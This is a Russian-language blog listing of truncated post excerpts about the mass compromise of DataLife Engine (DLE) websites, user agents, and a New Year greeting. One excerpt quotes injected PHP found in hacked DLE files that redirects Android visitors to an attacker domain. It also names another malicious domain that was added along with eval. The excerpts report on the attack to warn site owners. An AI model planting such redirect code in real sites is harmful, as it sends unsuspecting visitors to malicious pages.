Всем привет! Это первый пост, который я пишу в Новом году. Уже почти  прошли все новогодние праздники (ну, за исключением разве что Старого-Нового года) и уже можно снимать новогодние украшения с блога. Хотя это, как говорится, на любителя, вон некоторые только новогоднюю ёлку умудряются  в марте выкидывают. Но это дело вкуса, а сейчас я расскажу  […]

Начало. Уязвимость в сайтах на движке Как видим, добавился не только новый домен http://yacounter.ws (ну любит злоумышленник зону ws, что тут поделать), но и eval. Но и за первую версию также есть случаи, которые говорят следующее. В файлах движка цмс  dle появляется совсем другой код, например, такой: if(stripos($_SERVER[‘HTTP_USER_AGENT’],”Android”)!==false) {header(‘Location: http://refresh-browser.00xff.net/’);exit;} Как видим, домен здесь совсем […]

Как ломали сайты на  популярном новостном движке ДЛЕ, хронология событий. Совсем недавно я писал о том, что в начале месяца  было взломано огромное количество сайтов на dle, в результате чего на сайтах ничего не подозревающих владельцев,  естественно без их ведома,  прописывался вредоносный код. Сегодня поговорим более подробно про уязвимости в сайтах на движке dle, как […]

Что такое  юзер-агент и для чего его нужно менять? User Agent (юзер-агент) – клиентское  приложение, работающее по определенным правилам (протоколам). В роли таких приложений могут выступать  различные  браузеры, мобильные устройства (смартфоны), роботы поисковых систем.  При посещении какого-либо веб-узла, сео-блога в интернете приложение посылает информацию о себе  виде   HTTP-запроса, который начинается словами: User-Agent (User-agent). Эта информация […]

Прошлый раз я писал о том, как Жерар Депардье стал жителем Подмосковья  и о конкурсе сеокафестатейность, а в этот раз  давайте поговорим  о  компьютерной безопасности. Первая и самая главная новость  за сегодня – это обнаруженная не так давно уязвимость в популярном пользовательском движке Data Life Engine (DLE).   В чём заключается данная уязвимость?  Как сообщается на […]